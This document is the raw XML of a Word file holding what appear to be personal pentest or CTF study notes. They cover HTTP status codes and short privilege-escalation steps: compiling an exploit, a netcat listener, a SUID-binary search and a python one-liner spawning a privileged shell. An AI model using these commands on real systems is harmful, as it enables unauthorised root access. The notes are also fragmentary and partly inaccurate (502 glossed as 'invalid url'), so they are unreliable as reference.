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DB12" w14:textId="7CF14872" w:rsidR="00556F34" w:rsidRDefault="00CC111A">
      <w:r>
        <w:t>100 information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7528F0" w14:textId="2067F172" w:rsidR="00CC111A" w:rsidRDefault="00CC111A">
      <w:r>
        <w:t>200</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>succesful</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA66C68" w14:textId="669632BE" w:rsidR="00CC111A" w:rsidRDefault="00CC111A">
      <w:r>
        <w:t>300</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>redirection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B259225" w14:textId="7ACD21A4" w:rsidR="00CC111A" w:rsidRDefault="00CC111A">
      <w:r>
        <w:t>400</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>client side error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A907C1A" w14:textId="54133AFE" w:rsidR="00CC111A" w:rsidRDefault="00CC111A">
      <w:r>
        <w:t>500</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>server side error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25816827" w14:textId="70856D0B" w:rsidR="00FA0056" w:rsidRDefault="00CC111A">
      <w:r>
        <w:t>403</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>not autherised</w:t>
      </w:r>
      <w:r w:rsidR="00FA0056">
        <w:t xml:space="preserve"> (forbidden)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3563DAB2" w14:textId="2237E50D" w:rsidR="00CC111A" w:rsidRDefault="00CC111A">
      <w:r>
        <w:t>404</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>not found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555AF0D3" w14:textId="234BEEBA" w:rsidR="00FA0056" w:rsidRDefault="00FA0056">
      <w:r>
        <w:t>50</w:t>
      </w:r>
      <w:r w:rsidR="00301638">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00301638">
        <w:tab/>
        <w:t>invalid url</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33121B71" w14:textId="58B39348" w:rsidR="00166B17" w:rsidRDefault="00166B17"/>
    <w:p w14:paraId="7C260F73" w14:textId="5B2BB2A6" w:rsidR="00166B17" w:rsidRDefault="00166B17"/>
    <w:p w14:paraId="36717E85" w14:textId="47F53774" w:rsidR="00166B17" w:rsidRDefault="00166B17">
      <w:r>
        <w:t xml:space="preserve">Gcc </w:t>
      </w:r>
      <w:r w:rsidR="008222C6">
        <w:t>exploit.c -o abc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255D2D17" w14:textId="6ABE3ECD" w:rsidR="008222C6" w:rsidRDefault="008222C6">
      <w:r>
        <w:t>./abc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7C2966" w14:textId="1D70D595" w:rsidR="008222C6" w:rsidRDefault="007F5BAE">
      <w:r>
        <w:t>Nc -lvnp 1337</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D73649C" w14:textId="77777777" w:rsidR="0082345B" w:rsidRDefault="0082345B">
      <w:r>
        <w:t>find / -user root -perm /4000 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738A1F7C" w14:textId="7F9B78D0" w:rsidR="007F5BAE" w:rsidRDefault="000B4D2C">
      <w:r>
        <w:t>Gtfobin</w:t>
      </w:r>
      <w:r w:rsidR="0082345B">
        <w:t>s      suid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C80742F" w14:textId="77777777" w:rsidR="00553B23" w:rsidRPr="00553B23" w:rsidRDefault="00553B23" w:rsidP="00553B23">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FF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3B23">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="BF0707"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFF4F4"/>
        </w:rPr>
        <w:t>python -c 'import os; os.execl("/bin/sh", "sh", "-p")'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A76CCD6" w14:textId="77777777" w:rsidR="00553B23" w:rsidRDefault="00553B23"/>
    <w:p w14:paraId="16C32BB5" w14:textId="689B54F6" w:rsidR="000B4D2C" w:rsidRDefault="00E43F0F">
      <w:r>
        <w:t>md5sum hash.txt ( to generate hash)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A17446D" w14:textId="59A8C204" w:rsidR="00E17A9F" w:rsidRDefault="00E17A9F"/>
    <w:p w14:paraId="3A280B0A" w14:textId="3AAC9E61" w:rsidR="00E17A9F" w:rsidRDefault="00E17A9F">
      <w:r>
        <w:t>httpx tool for active subdomains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B44C46F" w14:textId="2A9D5C6C" w:rsidR="00956F7B" w:rsidRDefault="00956F7B">
      <w:r>
        <w:t>c2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EF5B25" w14:textId="18C426AF" w:rsidR="00956F7B" w:rsidRDefault="00956F7B">
      <w:r>
        <w:t>crackmapexec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380CB548" w14:textId="4EC2FF34" w:rsidR="00F530F6" w:rsidRDefault="00F530F6">
      <w:r>
        <w:t>crtp</w:t>
      </w:r>
      <w:r w:rsidR="00970167">
        <w:t xml:space="preserve"> exam</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C55C43" w14:textId="0F09E494" w:rsidR="0075550E" w:rsidRDefault="0075550E">
      <w:r>
        <w:t>sick OS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0992BB77" w14:textId="4D0EE34D" w:rsidR="00CA361F" w:rsidRDefault="001B64E9">
      <w:r>
        <w:t>pilgrimage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F32DFAE" w14:textId="4E974B5D" w:rsidR="00B41755" w:rsidRDefault="00B41755">
      <w:r>
        <w:t>hospital</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D33112B" w14:textId="4B26650E" w:rsidR="00460BF8" w:rsidRDefault="00460BF8"/>
    <w:p w14:paraId="018F10A0" w14:textId="1243FCC9" w:rsidR="00F530F6" w:rsidRDefault="00DE2155">
      <w:r>
        <w:t xml:space="preserve">devoss </w:t>
      </w:r>
      <w:r w:rsidR="00460BF8">
        <w:t>xerxes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55455B59" w14:textId="2431E50E" w:rsidR="006E0110" w:rsidRDefault="006E0110">
      <w:r>
        <w:t xml:space="preserve">gcc </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292D1F35" w14:textId="1A05351B" w:rsidR="002B78E7" w:rsidRDefault="002B78E7">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>./xero website 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B352B0A" w14:textId="11C0C85F" w:rsidR="00D20C3A" w:rsidRDefault="00D20C3A"/>
    <w:p w14:paraId="2BD39EA8" w14:textId="77777777" w:rsidR="00D20C3A" w:rsidRDefault="00D20C3A"/>
    <w:p w14:paraId="652F64D2" w14:textId="77777777" w:rsidR="008222C6" w:rsidRDefault="008222C6"/>
    <w:p w14:paraId="632C4A90" w14:textId="77777777" w:rsidR="00CC111A" w:rsidRDefault="00CC111A"/>
    <w:sectPr w:rsidR="00CC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71"/>
    <w:rsid w:val="000B4D2C"/>
    <w:rsid w:val="00166B17"/>
    <w:rsid w:val="001B0E4A"/>
    <w:rsid w:val="001B64E9"/>
    <w:rsid w:val="002B78E7"/>
    <w:rsid w:val="00301638"/>
    <w:rsid w:val="00460BF8"/>
    <w:rsid w:val="00553B23"/>
    <w:rsid w:val="00556F34"/>
    <w:rsid w:val="006E0110"/>
    <w:rsid w:val="0075550E"/>
    <w:rsid w:val="007F5BAE"/>
    <w:rsid w:val="008222C6"/>
    <w:rsid w:val="0082345B"/>
    <w:rsid w:val="00956F7B"/>
    <w:rsid w:val="00970167"/>
    <w:rsid w:val="00B41755"/>
    <w:rsid w:val="00CA361F"/>
    <w:rsid w:val="00CC111A"/>
    <w:rsid w:val="00D20C3A"/>
    <w:rsid w:val="00DE2155"/>
    <w:rsid w:val="00E17A9F"/>
    <w:rsid w:val="00E43F0F"/>
    <w:rsid w:val="00ED4C71"/>
    <w:rsid w:val="00F530F6"/>
    <w:rsid w:val="00FA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BFBC"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{50F77021-BE48-4B86-A659-2F1B4AE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B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2023-11-27T15:44:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-28T17:23:00Z</dcterms:modified>
</cp:coreProperties>
</file>